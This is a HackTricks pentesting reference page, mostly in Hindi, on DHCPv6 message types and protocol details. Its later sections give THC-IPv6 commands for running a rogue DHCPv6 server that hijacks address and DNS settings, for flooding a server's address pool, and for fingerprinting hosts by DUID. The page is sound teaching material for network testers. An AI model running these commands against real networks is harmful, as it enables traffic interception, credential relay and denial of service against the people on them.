DHCPv6

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

DHCPv6 बनाम DHCPv4 - संदेश प्रकारों की तुलना

A comparative view of DHCPv6 and DHCPv4 message types is presented in the table below:

DHCPv6 Message TypeDHCPv4 Message Type
Solicit (1)DHCPDISCOVER
Advertise (2)DHCPOFFER
Request (3), Renew (5), Rebind (6)DHCPREQUEST
Reply (7)DHCPACK / DHCPNAK
Release (8)DHCPRELEASE
Information-Request (11)DHCPINFORM
Decline (9)DHCPDECLINE
Confirm (4)none
Reconfigure (10)DHCPFORCERENEW
Relay-Forw (12), Relay-Reply (13)none

DHCPv6 संदेश प्रकारों का विस्तृत विवरण:

  1. Solicit (1): उपलब्ध सर्वरों को खोजने के लिए DHCPv6 क्लाइंट द्वारा आरंभ किया जाता है।
  2. Advertise (2): Solicit के जवाब में सर्वर द्वारा भेजा जाता है, जो DHCP सेवा उपलब्ध होने का संकेत देता है।
  3. Request (3): क्लाइंट इसका उपयोग किसी विशिष्ट सर्वर से IP addresses या prefixes का अनुरोध करने के लिए करते हैं।
  4. Confirm (4): किसी क्लाइंट द्वारा यह सत्यापित करने के लिए उपयोग किया जाता है कि असाइन किए गए पते नेटवर्क पर अभी भी वैध हैं या नहीं, आमतौर पर नेटवर्क परिवर्तन के बाद।
  5. Renew (5): क्लाइंट इसे मूल सर्वर को भेजते हैं ताकि पते की अवधि बढ़ाने या कॉन्फ़िगरेशन अपडेट करने के लिए।
  6. Rebind (6): किसी भी सर्वर को भेजा जाता है ताकि पते की अवधि बढ़ाई जा सके या कॉन्फ़िगरेशन अपडेट हो सकें, विशेषकर जब Renew का उत्तर न मिले।
  7. Reply (7): सर्वर इसका उपयोग पते, कॉन्फ़िगरेशन पैरामीटर्स प्रदान करने या Release या Decline जैसे संदेशों की पुष्टि करने के लिए करते हैं।
  8. Release (8): क्लाइंट सर्वर को सूचित करते हैं कि एक या अधिक असाइन किए गए पतों का उपयोग बंद कर दिया जाए।
  9. Decline (9): क्लाइंट द्वारा भेजा जाता है ताकि रिपोर्ट किया जा सके कि असाइन किए गए पते नेटवर्क पर टकराव में हैं।
  10. Reconfigure (10): सर्वर क्लाइंट्स को नए या अपडेटेड कॉन्फ़िगरेशन के लिए ट्रांजैक्शन शुरू करने का संकेत देते हैं।
  11. Information-Request (11): क्लाइंट बिना IP address असाइनमेंट के कॉन्फ़िगरेशन पैरामीटर्स का अनुरोध करते हैं।
  12. Relay-Forw (12): Relay agents संदेशों को सर्वर तक आगे भेजते हैं।
  13. Relay-Repl (13): सर्वर relay agents को उत्तर देते हैं, जो फिर संदेश को क्लाइंट तक पहुँचाते हैं।

त्वरित प्रोटोकॉल नोट्स (Offensive)

  • DHCPv6 clients use UDP port 546 and servers/relays use UDP port 547.
  • Clients send Solicit to All_DHCP_Relay_Agents_and_Servers (ff02::1:2); servers/relays listen there. All_DHCP_Servers is ff05::1:3.
  • Client and server identities are carried in OPTION_CLIENTID and OPTION_SERVERID using DUIDs. This is handy for fingerprinting the same host across address changes.
  • Address assignment is requested with IA_NA (non-temporary address) and prefix delegation with IA_PD (downstream router prefix).

Quick Recon

# Basic DHCPv6 traffic capture
sudo tcpdump -vvv -i <IFACE> 'udp port 546 or udp port 547'

# THC-IPv6: discover DHCPv6 servers and their options
sudo atk6-dump_dhcp6 <IFACE>

Rogue DHCPv6 Server (Address/DNS Hijack)

# THC-IPv6: rogue DHCPv6 server advertising address + DNS
sudo atk6-fake_dhcps6 <IFACE> <PREFIX>/<LEN> <DNSv6>

यह एक सामान्य on-link rogue DHCPv6 सर्वर है। Windows/AD नेटवर्क पर, यदि आप NTLM relay primitives चाहते हैं तो इसे higher-level relays के साथ जोड़ें (देखें IPv6 पेज)।

पूल समाप्ति / DHCPv6 Starvation

# THC-IPv6: exhaust the server's address pool
sudo atk6-flood_dhcpc6 <IFACE>

Reconfigure संदेश चेतावनी

DHCPv6 Reconfigure को बिना सोचे-समझे स्वीकार नहीं किया जाता: क्लाइंट इसे केवल तभी स्वीकार करते हैं जब उन्होंने स्पष्ट रूप से OPTION_RECONF_ACCEPT भेजा हो। डिफ़ॉल्ट रूप से, एक क्लाइंट Reconfigure संदेश स्वीकार करने के लिए इच्छुक नहीं होता है, इसलिए बिना ठोस आधार वाले Reconfigure हमले अक्सर विफल हो जाते हैं, जब तक कि आप उस विकल्प का अवलोकन न कर लें या उसे उत्प्रेरित न कर दें।

Pentesting IPv6

संदर्भ

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें